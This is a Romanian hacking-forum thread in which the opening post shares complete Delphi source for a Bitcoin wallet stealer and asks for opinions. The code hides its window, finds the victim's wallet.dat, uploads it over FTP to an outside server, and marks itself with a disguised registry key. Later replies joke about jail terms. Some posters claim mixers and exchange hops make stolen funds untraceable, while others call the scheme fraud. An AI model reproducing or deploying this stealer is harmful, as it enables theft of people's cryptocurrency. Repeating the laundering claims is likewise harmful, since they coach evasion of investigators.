Jump to content
TheRogue27

Wallet stealer - pareri

By TheRogue27, in Cosul de gunoi

Recommended Posts

TheRogue27 Newbie

TheRogue27

Posted
Posted

Ce parere aveti despre wallet stealer-ul asta

https://leakforums.org/thread-232703


program dbs;

// Bitcoin Stealer
// developed by Jimmy
// for http://exclusivehackingtools.blogspot.com

{$IF CompilerVersion >= 21.0}
  {$WEAKLINKRTTI ON}
  {$RTTI EXPLICIT METHODS([]) PROPERTIES([]) FIELDS([])}
{$IFEND}

uses
  Windows, System.SysUtils, System.Classes, ShlObj, IdFTP, Registry;

// Function to set the window state hidden
function GetConsoleWindow: HWND; stdcall; external kernel32 name 'GetConsoleWindow';

// Function to get the AppData path
function AppDataPath: String;
const
  SHGFP_TYPE_CURRENT = 0;
var
  Path: array [0 .. MAXCHAR] of char;
begin
  SHGetFolderPath(0, CSIDL_LOCAL_APPDATA, 0, SHGFP_TYPE_CURRENT, @path[0]);
  Result := StrPas(Path);
end;

// Function to check a file size
function FileSize(FileName: wideString): Int64;
var
  sr: TSearchRec;
begin
  if FindFirst(FileName, faAnyFile, sr) = 0 then
    Result := Int64(sr.FindData.nFileSizeHigh) shl Int64(32) + Int64(sr.FindData.nFileSizeLow)
  else
    Result := -1;

  FindClose(sr);
end;

// Function to generate random string
function RandomString(PLen: Integer): string;
var
  str: string;
begin
  Randomize;
  str := 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
  Result := '';
  repeat
    Result := Result + str[Random(Length(str)) + 1];
  until (Length(Result) = PLen);
end;

// ============================================================================

var
  Debug: Boolean;
  FTP: TIdFTP;
  REG: TRegIniFile;
  RegPath, RegValue, RegCurrentValue, Path, UploadPath, FileName: String;
  Error: String;

begin
  // The window should be hidden without using this API
  ShowWindow(GetConsoleWindow, SW_HIDE);

  // Debug or build release ?
  Debug := True;

  // Set registry key value (random)
  RegValue := '6556';

  // At the end of the first execution we will write a key in the registry.
  // Now we will try check if the key exists. If yes, it means
  // that the wallet has already be stolen. Avoid useless duplicates.
  try
    REG := TRegIniFile.Create;
    REG.RootKey := HKEY_CURRENT_USER;
    REG.OpenKeyReadOnly('Software');
    RegCurrentValue := REG.ReadString('Google', 'Version', '');
    REG.CloseKey;
    REG.Free;
  except
  end;

  // Check if wallet has been already stolen (to avoid duplicates)
  if not(RegCurrentValue = RegValue) then
  begin
    try
      // Generate path to Bitcoin wallet file
      if Win32MajorVersion >= 6 then
        // Microsoft Windows Vista and newer
        Path := ExpandFileName(AppDataPath + '\..\Roaming\Bitcoin\wallet.dat')
      else
        // Microsoft Windows XP
        Path := ExpandFileName(AppDataPath + '\..\Bitcoin\wallet.dat');

      // If wallet file exists, check the FileSize (skip large file > 10MB)
      if FileExists(Path) then
        if FileSize(Path) < 10000000 then
        begin
          // Generate a random filename
          FileName := RandomString(20) + '.dat';

          // Initialize upload via Indy FTP component
          FTP := TIdFTP.Create();
          FTP.ConnectTimeout := 20000;
          FTP.ReadTimeout := 20000;

          // Setup with your FTP details
          FTP.Host := 'ftp.host.com';
          FTP.Username := 'username';
          FTP.Password := 'password';
          UploadPath := 'www/';

          // Connect and upload
          if not Debug then
          begin
            FTP.Connect;
            FTP.Put(Path, UploadPath + FileName);
          end;

          // After upload attempt, disconnect and free the FTP component
          FTP.Quit;
          FTP.Disconnect;
          FTP.Free;

          // Try to add a key to registry to avoid double execution
          try
            REG := TRegIniFile.Create;
            REG.RootKey := HKEY_CURRENT_USER;
            REG.OpenKey('Software', True);
            REG.WriteString('Google', 'Version', RegValue);
            REG.CloseKey;
            REG.Free;
          except
          end;
        end;
    except
      // Catch error, you never know...
      on E: Exception do
        Error := E.ClassName + ': ' + E.Message;
    end;
  end;

end.

  • Upvote 1
Link to comment
Share on other sites
Che Collaborator

Che

Posted
Posted
A reusit cineva sa il testeze? eu l-am cimpilat dar nu am pe ce/cum sa il verific

"Cimpilat" ?! :D

Referitor la topicul tau:

Wallet stealer - pareri

Pareri... Pai cam intre 2 si 5 ani pentru buna purtare, la romani, la americani intre 20 si 50 de ani pentru buna purtare. :))

Link to comment
Share on other sites
Pastilatu' Newbie

Pastilatu'

Posted
Posted
"Cimpilat" ?! :D

Referitor la topicul tau:

Pareri... Pai cam intre 2 si 5 ani pentru buna purtare, la romani, la americani intre 20 si 50 de ani pentru buna purtare. :))

Eh , de parca stie Politia Romana ce e ala Bitcoin. :)) Fi serios. Ca sa numai zic de tracking-ul la fonduri prin mai multe Mixere ... hehe ... ce-ai bai baiatule baga-ti mintile in cap ...bani dispar pe exchange-uri bagate in alte monezi dupaia scoase dupaia bagate pe un cont frumos facute cold storage si te doare la basca.

  • Upvote 1
Link to comment
Share on other sites
Che Collaborator

Che

Posted
Posted
Eh ' date=' de parca stie Politia Romana ce e ala Bitcoin. :)) Fi serios. Ca sa numai zic de tracking-ul la fonduri prin mai multe Mixere ... hehe ... ce-ai bai baiatule baga-ti mintile in cap ...bani dispar pe exchange-uri bagate in alte monezi dupaia scoase dupaia bagate pe un cont frumos facute cold storage si te doare la basca.[/quote']

Ai un miliard de lei sa zicem. (lei vechi) Si sa zicem ca-s castigati la ruleta intr-un cazinou. Ai de la cazinou o data ce ti-au dat banii ti-au trecut si datele tale cum ca i-ai incasat. Sa zicem ca vrei sa eviti acel impozit pe castigurile din jocurile de noroc.

Banii figureaza pe numele tau. Ce faci ca sa eviti impozitul ? Ii transformi in dolari si pe urma in euro ? Si pe urma ?

Alta varianta. Banii sunt proveniti din alte activitati care nu figureaza in acte contabile.

Doar nu o sa tii un miliard sub saltea, ii pui la o banca. Brusc figurezi in acte, real, ca ai un milard de lei. Deja totul e limpede, ai bani, trebuie sa spui de unde si cum.

Alta varianta ?

Explica mai pe larg daca nu te superi, ca-s tare curios de ce zici tu.

Apropo, politistii cred ca bitcoinul e o chestie care se pune la epoleti. :))

Link to comment
Share on other sites
Pastilatu' Newbie

Pastilatu'

Posted
Posted
Ai un miliard de lei sa zicem. (lei vechi) Si sa zicem ca-s castigati la ruleta intr-un cazinou. Ai de la cazinou o data ce ti-au dat banii ti-au trecut si datele tale cum ca i-ai incasat. Sa zicem ca vrei sa eviti acel impozit pe castigurile din jocurile de noroc.

Banii figureaza pe numele tau. Ce faci ca sa eviti impozitul ? Ii transformi in dolari si pe urma in euro ? Si pe urma ?

Alta varianta. Banii sunt proveniti din alte activitati care nu figureaza in acte contabile.

Doar nu o sa tii un miliard sub saltea, ii pui la o banca. Brusc figurezi in acte, real, ca ai un milard de lei. Deja totul e limpede, ai bani, trebuie sa spui de unde si cum.

Alta varianta ?

Explica mai pe larg daca nu te superi, ca-s tare curios de ce zici tu.

Apropo, politistii cred ca bitcoinul e o chestie care se pune la epoleti. :))

Pai da ma dar eu vorbesc strict despre Bitcoin .... .

Link to comment
Share on other sites
TYJ Newbie

TYJ

Posted
Posted

Pai deja aici intra frauda.

Clonare de carduri = furtul de pe card = golirea walletului de bitcoin. BTC tot bani sunt, cardurile tot bani sunt. Deci tot frauda faci cand zici "wallet steaker".

E legala aceasta metoda de furt? NU! Nu este.

Pa!

Link to comment
Share on other sites
Worm64 Newbie

Worm64

Posted
Posted

@Pastilatu': Nu stiu daca stiai dar FBI organizeaza training-uri periodice la bucuresti.Acei politisti care se ocupa cu investigarea fraudelor informatice au habar.Chiar au fost arestari in care au fost aduse ca probe la dosar adrese de btc+tranzactii de pe blockchain.

BTC nu este chiar asa anonim si sigur pe cat pare.

Link to comment
Share on other sites
bleg Newbie

bleg

Posted
Posted

Nu mai pot cu cardurile voastre pisa-m-as pe ele! Numai carduri si lovele aveti in cap! @TheRogue27 a pus un cod sursa si a vrut pareri despre el, adica oameni care se pricep si/sau au testat! Voi ce ati facut, ati inceput sa o ardeti cu cardurile. Pisa-m-as pe ele bis!

Link to comment
Share on other sites
Pastilatu' Newbie

Pastilatu'

Posted
Posted
@Pastilatu': Nu stiu daca stiai dar FBI organizeaza training-uri periodice la bucuresti.Acei politisti care se ocupa cu investigarea fraudelor informatice au habar.Chiar au fost arestari in care au fost aduse ca probe la dosar adrese de btc+tranzactii de pe blockchain.

BTC nu este chiar asa anonim si sigur pe cat pare.

Nu te contrazic , nu are rost oricum a degenerat discutia.

Dar ca sa iti zic asa ..... acum cateva luni sau furat milioane de dolari in Bitcoin ....:) where is FBI ? Nu e o retea anonima ...bineinteles, dar exista BitMixere .... . Am incercat eu sa urmaresc un jaf de genu de la unu din exchange-uri ...si m-am pierdut dupa a 3 a transa de mutare a fondurilor.

  • Upvote 1
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...